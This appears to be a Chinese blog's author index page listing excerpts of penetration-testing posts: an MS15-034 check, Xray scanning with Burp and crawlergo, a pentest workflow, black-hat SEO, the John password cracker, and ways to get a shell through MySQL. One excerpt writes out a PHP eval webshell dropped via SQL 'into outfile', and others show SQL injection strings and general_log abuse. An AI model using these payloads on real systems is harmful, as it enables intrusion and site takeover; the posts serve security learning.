网络安全
Blue_Starry_sky
这个作者很懒,什么都没留下…
展开
-
http.sys整数溢出漏洞(MS15-034)验证方法
漏洞成因:18446744073709551615转为十六进制即是 0xFFFFFFFFFFFFFFFF(16个F),是64位无符号整形所能表达的最大整数,这个“整数溢出”必然同这个异常的超大整数有关,若IIS服务器返回“416 Requested Range Not Satisfiable”,则是存在漏洞,若返回”The request has an invalid header name“,或其他状态码则说明漏洞已经修补。漏洞危害:利用该漏洞构造恶意的http请求数据包,可使服务器系统蓝屏崩原创 2021-01-23 11:41:17 · 4011 阅读 · 0 评论 -
Burpsuit结合xray使用
在浏览器代理的基础上,更方便的做法是使用burp的中转功能结合xray,这样扫描到的资源会更多。首先,进行burp的中转设置,如下图:然后启动xray,打开浏览器,将代理设置为burp的端口,如下图:访问目标网站,可以发现所有流量经burp后发送到xray进行扫描,大多数的加载项已经可以扫描,只剩下少数的需要主动触发的扫描需要人为干预。...原创 2021-01-23 11:02:28 · 1194 阅读 · 0 评论 -
浏览器代理结合Xray扫描
Xray是一个方便有用的漏洞扫描工具,综合了许多常见的poc和漏洞,怎样才能更好的使用xray去发现漏洞?最简单的方法是直接使用浏览器+xray,然后需要主动去触发网站的内容,这样才能进行扫描。首先,从GitHub下载xray,启动xray使用命令.\xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output test.html具体的参数意义可以去xray的readme.md查询,一般我喜欢将上述命令写成.bat原创 2021-01-23 10:52:48 · 1611 阅读 · 0 评论 -
crawlergo.exe结合X-ray实现自动扫描
一般来说,使用X-ray扫描web漏洞就那几种方式,但是都需要人主动点击触发扫描这个过程,个人感觉不方便,最近发现github有人使用crawlergo.exe结合X-ray使用爬虫可以完全自动化扫描,可将扫描放到服务器上,然后等着收割漏洞。(附地址:https://github.com/timwhitez/crawlergo_x_XRAY)但是下载后发现除了说明中提到的权限不足拒绝访问的问题,如下图:出现拒绝访问的问题,按照说明文档的指引,删除crawlergo文件夹即可,但是还会出现系统找不原创 2021-01-23 00:50:25 · 1303 阅读 · 0 评论 -
渗透测试流程
1.信息收集主动收集通过访问目标地址,和相关地址或者通过扫描等方式收集信息;优点:收集到的信息比较多;缺点:可能会被记录自己的操作信息,导致打草惊蛇;被动收集通过第三方的服务来收集目标的相关信息;优点:基本上对方处于无感知状态;缺点:收集内容有限,速度较慢;一般情况下,最好先采用被动收集的方法去收集信息,然后采用主动收集去有目的的收集在被动收集过程中缺少的信息;需要收集的信息...原创 2019-04-19 15:49:21 · 4050 阅读 · 0 评论 -
黑帽SEO手法
0x00:概念SEO全称搜索引擎优化,通过站内优化和站内优化方式来提升搜索引擎排名,有白帽SEO和黑帽SEO。因为正规的SEO优化需要很长时间,黑帽SEO手法让站内快速提升排名的有: 黑链(暗链) 站群 网站劫持(搜索引擎劫持) 桥页 0x01:SEO的一些黑色手法常见的SEO手法: 利用泛解析做站群 入侵高权重网站挂暗链 ...转载 2019-04-03 10:06:32 · 2138 阅读 · 0 评论 -
sql语句利用into outfile写入一句话
利用需要的条件有:1、对web目录需要有写权限能够使用单引号2、知道绝对路径3、没有配置-secure-file-priv当知道路径时,可以直接用?id=1 union select "<?php @eval($_POST['123']);?>" into outfile("C:/phpStudy/WWW/a.php")或者采用PHPmyadmin,选择一个数据库如...原创 2019-03-04 15:32:44 · 6802 阅读 · 0 评论 -
利用general_log来getshell
设置了general_log和general_log_file之后所有SQL记录都会写入指定的文件使用show variables like '%general%'; //查询general_log的开启状态如图如果没有开启可以使用set global general_log=on;//将其打开。然后使用set global general_log_file='...原创 2019-03-04 15:27:04 · 885 阅读 · 0 评论 -
常见漏洞与分析
一、SQL注入(1)注入产生原理使用用户输入的参数拼凑SQL语句,用户对服务器端代码里的SQL语句可控,使服务器执行恶意的sql命令http://bbs.pconline.com.cn/topic.jsp?tid=1 ' and 1=2(2)万能密码select * from tb_name where name = ' ' or 1=1 - - ' and passwd = ' '(3)危害...转载 2018-07-15 14:54:23 · 4466 阅读 · 0 评论 -
John介绍及常用命令使用说明
john是一款大受欢迎的、免费的开源软件、基于字典的密码破解工具。用于在已知密文的情况下尝试破解出明文的破解密码软件,支持目前大多数的加密算法,如DES、MD4、MD5等。John支持字典破解方式和暴力破解方式。它支持多种不同类型的系统架构,包括Unix、Linux、Windows、DOS模式、BeOS和OpenVMS,主要目的是破解不够牢固的Unix/Linux系统密码。在对john输入原创 2017-03-10 20:28:49 · 19408 阅读 · 0 评论